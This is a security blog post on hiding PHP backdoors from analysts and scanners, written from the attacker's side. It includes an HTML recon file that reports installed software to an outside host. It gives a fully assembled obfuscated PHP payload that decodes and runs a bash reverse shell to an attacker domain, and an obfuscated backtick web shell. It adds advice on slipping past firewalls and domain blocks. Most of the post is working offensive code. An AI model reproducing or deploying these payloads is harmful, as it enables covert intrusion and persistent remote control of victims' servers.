> For the complete documentation index, see [llms.txt](https://strik3r.gitbook.io/strik3r-blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strik3r.gitbook.io/strik3r-blog/security-blogs/the-art-of-camouflage-exploring-advanced-php-backdoor-obfuscation-techniques.md).

# The Art of Camouflage: Exploring Advanced PHP Backdoor Obfuscation Techniques

## <mark style="color:yellow;">**What is code obfuscation and why do we use it?**</mark>

Obfuscation, in computing, consists of rendering an executable program or source code unreadable and hard to understand by a human while maintaining its functioning. The objective is to bypass static code analyzers as much as possible as well as a waste of time for the analysts who will study the code. Obfuscation of character strings is one of the techniques most used by malware creators. This method consists of concealing, or rendering incomprehensible, character strings using an algorithm that will decode the data when the code executes

### <mark style="color:green;">**Pre-Forging our payload**</mark>

When doing any red team engagement we should focus and try to get as much information about the target during the recon phase like everything about the infrastructure or the devices that we\`re targeting

### <mark style="color:green;">**HTML Recon**</mark>

HTML is known to be safe Infront of many people including SOC teams or blue teams as it\`s not executable or malicious files if they were sent via E-mail. But we should make use of any technology to get our target result.

HTML recon is used to know if some binary file or some package exists on the system or not!

So if we created .html file and sent it to the target with this code:

{% code overflow="wrap" %}

```html
<link rel="stylesheet" href="./index.php" onload="alert('Success')" onerror="alert('Fail')">
```

{% endcode %}

So this will tell us if the index.php exists or not by making an alert if it exists this will make an alert `Success`. And if it does not exist it will alert `Fail`.

If we wanted to get a reverse shell through Python or any other way we must know where is the package executable in the operating system. So that we can make use of HTML recon and make a suitable payload.

**For example:**

If we are making a reverse shell via Python and the target system is Windows these are the paths where we should look at:

`C:\Users\user-name\AppData\Local\Programs\Python\Python-version`

Or by using CMD to locate Python package in our machine

`$ where python`

example of making use of HTML recon

{% code overflow="wrap" %}

```html
<link rel="stylesheet" href="index.php" onload="document.location='http:// secure-site.com/index.php?data='+btoa('index.php')" onerror="alert('fail')">
```

{% endcode %}

So assume index.php is the python path on Windows here in this example we used J.S inside HTML and tell it if this file “index.php” exists in the system send us a request to our host “secure-site.com” at index.php using `data` parameter which contains the file exist encoded with base64.

![](/files/1CCF6t2EnC6llIVdR40A)

If we decoded this value with base64 we shall get the file name or the package name installed in the path we specified.

![](/files/1r51vviOP2u7kxgHDWJW)

So this will be our first step in order to approach our target, is send this html to many employees at the company to get all available information about packages installed so that we can procced with our payload.

## <mark style="color:yellow;">**Planning for our malware**</mark>

In order to make our backdoor/malware less detectable and make it harder to be caught by blue teams analysts and anyone reviewing our code we going to obfuscate our php code with some simple and tricky methods like:

1. **Variables names also should consist of special characters like '\_' or $\_and numbers**
2. **Variable the variables:**

Sometimes it is convenient to be able to have variable variable names. That is a variable name that can be set and used dynamically. A normal variable is set with a statement such as:

\<?php\
$a = 'hello';\
?>

A variable variable takes the value of a variable and treats that as the name of a variable. In the above example, hello, can be used as the name of a variable by using two dollar signs. i.e.

```php
<?php
$$a = 'world';
?>
```

At this point two variables have been defined and stored in the PHP symbol tree: $a with contents "hello" and $hello with contents "world". Therefore, this statement:

```php
<?php
echo "$a ${$a}";
?>
```

produces the exact same output as:

```php
<?php
echo "$a $hello";
?>
```

they both produce: hello world.

* **Another Example of Variable the variables:**

{% code overflow="wrap" fullWidth="false" %}

```php
<?php
  //You can even add more Dollar Signs
  $Bar = "a";
  $Foo = "Bar";
  $World = "Foo";
  $Hello = "World";
  $a = "Hello";
  $a; //Returns Hello
  $$a; //Returns World
  $$$a; //Returns Foo
  $$$$a; //Returns Bar
  $$$$$a; //Returns a
  $$$$$$a; //Returns Hello
  $$$$$$$a; //Returns World
  //... and so on ...//
?>
```

{% endcode %}

1. Variables sequences should be varied, so, debugging or de-obfuscating the code now should be harder
2. With step 2 we can create a decoder and encoder functions from variables. The decoder function also should be obfuscated by truncating it following the previous rules, then using it as a variable to decode the encoded string. Example of this:

{% code overflow="wrap" fullWidth="false" %}

```php
<?php
//here we used system() with base64_decode. I encoded ls command to => bHM, then used the decoding function to execute it
$m = "c";
$u = "d";
$t = "4_";
$a = "e6";
$d = "s";
$n = "ba";
$universe = array(
    array("od", "e")
);
// ==================
//base64_decode()
$ord = "m";$dor = "u";$que = "t";$unique = "a";$nor = "d";$lamo = "n";
$final = $$lamo.$$nor;  // bas
$final1 = $$unique.$$que.$$dor; // e6 4_ d
$final2 = "e".$$ord.$universe[0][0];  // e c od
$final3 .= $universe[0][1]; // e
$to = $final.$final1.$final2.$final3; // base64_decode
$x = "s";
$r = "y";
$c = "s";
$s = "t";
$h = "e";
$p = "m";
$zx = $x.$r.$c.$s.$h.$p;
$zx($to("bHM")); // this will execute 'ls' command
$zx($to("YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzgwMDEgPCYxJw"));  
// this will execute => bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/8001 <&1' to get a reverse shell
?>
```

{% endcode %}

So here in this example, we used the variable <mark style="color:yellow;">**$zx**</mark> instead of <mark style="color:yellow;">**base64\_decode()**</mark> function by using nested variables.

1. If we used base64 payload or any base64 string we should consider removing the padding at the end of the string to not make it easy to understand that this is a base64 payload

**E.X:**

**`bHM==`** This is base64 encoded of “ls” command

the padding here is the **`==`** at the end of the command, so we need to remove this and make the command like this `bHM`

1. After crafting the base64 payload we can split it and use the nested variables trick and concatenate them to make it harder to reverse. if anyone tried to reverse one part only they will get nothing meaningful

### **💡**<mark style="color:yellow;">**Things to note in order to make hidden reverse shell or backdoor**</mark>

Yes, we will obfuscate our code, but even the system command needs to be executed in a secure manner. As a result, we will obfuscate the system command and create a standard payload while adhering to certain security requirements to prevent detection:

* We must connect to host via an already opened port or at least any whitelist port like ( 80,443 ) so that the firewall doesn't block our connection
* Turning off any verbosity since we want the compromised machine to remain silent and clean at the same time.
* Always try to not use your own IP to receive the reverse shell, instead use a domain name as the host to make it harder for the blue team to detect you. Also, this can help you to change the domain ip any time you want, so if they blocked your ip you can always change it
* If they blocked your domain for example secure-domain.com. you can always use another top-level domain as they will only block your domain and any subdomain for it. For example:

They will make a policy to forbid any connection from <mark style="color:yellow;">**secure-domain.com**</mark> or <mark style="color:yellow;">**\*.secure-domain.com**</mark>

But they will not make a policy to deny all <mark style="color:yellow;">**secure-domain**</mark><mark style="color:green;">**.\***</mark>

**✅ So, I've added&#x20;**<mark style="color:yellow;">**secure-domain.com**</mark>**&#x20;to my host list which refers to my localhost**

<figure><img src="/files/l61H1zmBskUQnIWLTW62" alt=""><figcaption></figcaption></figure>

At this time, we obfuscated the system() function, decoding and encoding functions to get a reverse shell to our machine via netcat

{% code overflow="wrap" %}

```php
$zx($to("YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzgwMDEgPCYxJw"));  

// this will execute => bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/8001 <&1' to get a shell
```

{% endcode %}

<mark style="color:green;">**So, what if the target does not have netcat installed in his system?**</mark>

* We can always use HTML Recon that we mentioned to know what binary packages installed in the targeted system.

## <mark style="color:yellow;">**Forging Our Payload**</mark>

In this example of obfuscating PHP malware, I used:

* Nested Variables
* Nested Arrays
* hex2bin()
* netcat reverse shell

#### <mark style="color:green;">**hex2bin function:**</mark>

Convert hexadecimal values to ASCII characters:

I separated the value **`hex2bin()`** into other variables, then concatenated all of them into one variable which is **`$_`**

{% code overflow="wrap" %}

```php
$ers = "x";
$uio = "bnm";
$res = "he";
$fgh = "ers";
$tys = "cvb";
$cvb = "2b";
$bnm = "in";
$asd = "res";
$_ = $$asd.$$fgh.$$tys.$$uio; // <== hex2bin()
```

{% endcode %}

* **Note: when making variables or nested variables for a function or value. We must shuffle the values of the variable so that it will be harder to read or understand from the first look.**

So do not make your variables in this form:

```php
$res = "he";
$ers = "x";
$cvb = "2b";
$bnm = "in";
$asd = "res";
$fgh = "ers";
$tys = "cvb";
$uio = "bnm";
```

**Because now it\`s very easy to detect what we are trying to make, even if we make nested variables.**

#### <mark style="color:green;">**System function**</mark>

For the system function I created nested arrays with Chinese language variables to make the variables harder to read, then I make the **system** word to **hex** to be like this:

```
73797374656d
```

Then I used the hex2bin() function to reverse it back:

```php
$测试
= array(
    array("73", 0, 10),
    array("79", 15, 20),
    array("73", 44, 33),
    array("74", 77, 88),
    array("65", 33, 0),
    array("6d", 55, 66)
);
$环形 = "测试";
```

So if we just echo this using the <mark style="color:yellow;">**$\_**</mark> which is hex2bin() it will return “<mark style="color:yellow;">**system**</mark>”

```php
echo $_($$环形[0][0].$$环形[1][0].$$环形[2][0].$$环形[3][0].$$环形[4][0].$$环形[5][0]);
```

![](/files/lWpJxrLnGgPVAa8FZfty)

So let\`s combine these parts into one other var:

{% code overflow="wrap" %}

```php
$最后 = $_($$环形[0][0].$$环形[1][0].$$环形[2][0].$$环形[3][0].$$环形[4][0].$$环形[5][0]);
```

{% endcode %}

#### <mark style="color:green;">**Reverse shell**</mark>

In this example, I assumed that the target is using Netcat on the system and we want to get a reverse shell.

So our reverse shell will be:

```bash
bash -c 'exec bash -i &>/dev/tcp/secure-site.com/8001 <&1'
```

let\`s encode that to <mark style="color:green;">**hex**</mark> it will be:

{% code overflow="wrap" %}

```
62617368202d632027657865632062617368202d6920263e2f6465762f7463702f7365637572652d736974652e636f6d2f38303031203c263127
```

{% endcode %}

Using the same <mark style="color:yellow;">**$\_ (hex2bin)**</mark> we will reverse this hex to its original value, but before that, we must cut this long hex string into many variables to not look suspicious.

So I divided this hex into 4 pieces with Bangla language variables names and combined them into one variable:

```php
$দুই = "20263e2f6465762f7463702f736563";
$চার = "38303031203c263127";
$এক = "62617368202d632027657865632062617368202d69";
$তিন = "7572652d736974652e636f6d2f";
$সব = $এক.$দুই.$তিন.$চার;
$最后($_($সব));
```

The final look of this payload:

{% code overflow="wrap" %}

```php
<?php
// hex2bin()
$ers = "x";
$uio = "bnm";
$res = "he";
$fgh = "ers";
$tys = "cvb";
$cvb = "2b";
$bnm = "in";
$asd = "res";
$_ = $$asd.$$fgh.$$tys.$$uio; // hex2bin
$测试 = array(
    array("73", 0, 10),
    array("79", 15, 20),
    array("73", 44, 33),
    array("74", 77, 88),
    array("65", 33, 0),
    array("6d", 55, 66)
);
$环形 = "测试";
$最后 =  $_($$环形[0][0].$$环形[1][0].$$环形[2][0].$$环形[3][0].$$环形[4][0].$$环形[5][0]);
$দুই = "20263e2f6465762f7463702f736563";
$চার = "38303031203c263127";
$এক = "62617368202d632027657865632062617368202d69";
$তিন = "7572652d736974652e636f6d2f";
$সব = $এক.$দুই.$তিন.$চার;
$最后($_($সব));
?>
```

{% endcode %}

🔥 Getting the reverse shell:

![](/files/kHC8Zq0ZXMyXHWVGbYwM)

## <mark style="color:yellow;">**Additional Notes about PHP Obfuscation:**</mark>

### <mark style="color:green;">**Web Shell**</mark>

A web shell is a malicious script used by an attacker with the intent to escalate and maintain persistent access to an already compromised web application. A web shell itself cannot attack or exploit a remote vulnerability, so it is always the second step of an attack (this stage is also referred to as post-exploitation).

We can use obfuscation techniques to make web shells even more hidden or harder to find.

### <mark style="color:yellow;">**Keeping Web Shells Under Cover**</mark>

1. <mark style="color:green;">**Using Backticks (\`) To Execute Shell Commands**</mark>

A well-documented but little-used method for executing shell commands in PHP is to simply encapsulate the command you wish to execute in backticks “\`” and then include encapsulated command as a line of code

PHP supports one execution operator: backticks (\`\`). Note that these are not single quotes! PHP will attempt to execute the contents of the backticks as a shell command; the output will be returned (i.e., it won't simply be dumped to output; it can be assigned to a variable).&#x20;

The use of the backtick operator is identical to shell\_exec().

**Example:**

```php
<?php
$output = `ls -al`;
echo "<pre>$output</pre>";
?>
```

**Obfuscated PHP web shell using Backticks**

<pre class="language-php" data-overflow="wrap"><code class="lang-php">&#x3C;?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>

<strong>// This is obfuscation of &#x3C;?=`$_GET[0]`?>
</strong><strong>// Example
</strong>https://target.com/path/to/shell.php?0=ls
</code></pre>

## <mark style="color:yellow;">Conclusion</mark>

delving into the realm of advanced PHP backdoor obfuscation techniques opens up a world of possibilities for both ethical and malicious actors. By leveraging sophisticated obfuscation methods, developers can enhance the security of their applications, protecting against potential threats. However, it is crucial to tread cautiously, as these techniques can also be exploited by attackers to conceal their malicious activities.

Remember, knowledge is power. By staying vigilant and keeping up with the latest advancements in PHP backdoor obfuscation, we empower ourselves to effectively combat potential threats and protect the integrity of our applications and sensitive data.

Thanks and shoutout to @CyberGuy (Momen Eldawakhly) who inspired me with these techniques and a lot more.

### <mark style="color:yellow;">Follow on Social Media</mark>

* [Facebook](https://www.facebook.com/StrikerHacker33/)
* [LinkedIn](https://www.linkedin.com/in/eslam-kamal/)
* [Twitter](https://twitter.com/xxEslam_Kamalxx)
* [Github](https://github.com/strik3r0x1)
